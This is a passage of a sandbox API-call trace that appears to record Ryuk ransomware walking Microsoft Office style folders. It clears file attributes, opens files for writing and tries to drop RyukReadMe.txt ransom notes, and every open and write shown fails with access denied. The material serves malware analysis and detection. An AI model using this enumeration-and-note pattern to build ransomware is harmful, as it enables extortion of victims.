Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\GrayCheck.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\graycheck.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.120] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.120] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.120] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.120] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.120] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\GreenTea.css", dwFileAttributes=0x80) returned 0 [0136.121] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\GreenTea.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\greentea.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.121] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.121] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.121] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.121] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.121] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\LightSpirit.css", dwFileAttributes=0x80) returned 0 [0136.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\LightSpirit.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\lightspirit.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.122] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.122] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.122] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.122] SetLastError (dwErrCode=0x0) [0136.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.122] GetLastError () returned 0x5 [0136.122] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.122] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.122] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Lime\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0136.122] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.122] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.122] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.123] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Lime\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0136.123] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Lime\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\lime\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.123] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.123] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.123] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.123] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.123] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Lime\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0136.123] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Lime\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\lime\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.124] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.124] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.124] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0136.124] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0136.124] SetLastError (dwErrCode=0x0) [0136.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Lime\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\lime\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.124] GetLastError () returned 0x5 [0136.124] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.124] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.124] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.124] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.124] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Lime.css", dwFileAttributes=0x80) returned 0 [0136.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Lime.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\lime.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.125] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.125] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.125] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.125] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.125] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Maroon.css", dwFileAttributes=0x80) returned 0 [0136.125] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Maroon.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\maroon.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.125] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.125] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.125] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.125] SetLastError (dwErrCode=0x0) [0136.125] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.125] GetLastError () returned 0x5 [0136.125] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.125] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.126] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Oasis\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0136.126] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.126] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.126] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.126] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Oasis\\HEADER.GIF", dwFileAttributes=0x80) returned 0 [0136.127] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Oasis\\HEADER.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\oasis\\header.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.127] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.127] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.127] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.127] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.127] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Oasis\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0136.127] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Oasis\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\oasis\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.127] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.127] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.127] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.127] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.128] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Oasis\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0136.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Oasis\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\oasis\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.128] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.128] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.128] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0136.128] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0136.128] SetLastError (dwErrCode=0x0) [0136.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Oasis\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\oasis\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.128] GetLastError () returned 0x5 [0136.128] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.128] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.128] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.128] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.129] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Oasis.css", dwFileAttributes=0x80) returned 0 [0136.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Oasis.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\oasis.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.129] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.129] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.129] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.129] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.129] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\OliveGreen.css", dwFileAttributes=0x80) returned 0 [0136.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\OliveGreen.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\olivegreen.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.129] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.129] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.130] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.130] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.130] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Premium.css", dwFileAttributes=0x80) returned 0 [0136.130] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Premium.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\premium.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.130] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.130] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.130] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.130] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.130] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\RTF_BOLD.GIF", dwFileAttributes=0x80) returned 0 [0136.131] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\RTF_BOLD.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\rtf_bold.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.131] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.131] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.131] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.131] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.131] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\rtf_choosefont.gif", dwFileAttributes=0x80) returned 0 [0136.131] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\rtf_choosefont.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\rtf_choosefont.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.132] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.132] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.132] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.132] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.132] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\rtf_italic.gif", dwFileAttributes=0x80) returned 0 [0136.132] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\rtf_italic.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\rtf_italic.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.132] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.132] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.132] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.132] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.133] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\rtf_spellcheck.gif", dwFileAttributes=0x80) returned 0 [0136.133] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\rtf_spellcheck.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\rtf_spellcheck.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.133] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.133] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.133] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.133] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.133] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\rtf_underline.gif", dwFileAttributes=0x80) returned 0 [0136.133] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\rtf_underline.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\rtf_underline.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.133] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.133] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.134] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.134] SetLastError (dwErrCode=0x0) [0136.134] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.134] GetLastError () returned 0x5 [0136.134] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.134] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.134] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Slate\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0136.135] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.135] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.135] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.135] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Slate\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0136.136] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Slate\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\slate\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.136] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.136] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.136] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.136] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.136] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Slate\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0136.136] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Slate\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\slate\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.136] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.136] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.136] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0136.137] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0136.137] SetLastError (dwErrCode=0x0) [0136.137] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Slate\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\slate\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.137] GetLastError () returned 0x5 [0136.137] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.137] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.137] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.137] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.137] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Slate.css", dwFileAttributes=0x80) returned 0 [0136.137] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Slate.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\slate.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.137] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.137] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.137] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.137] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.138] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 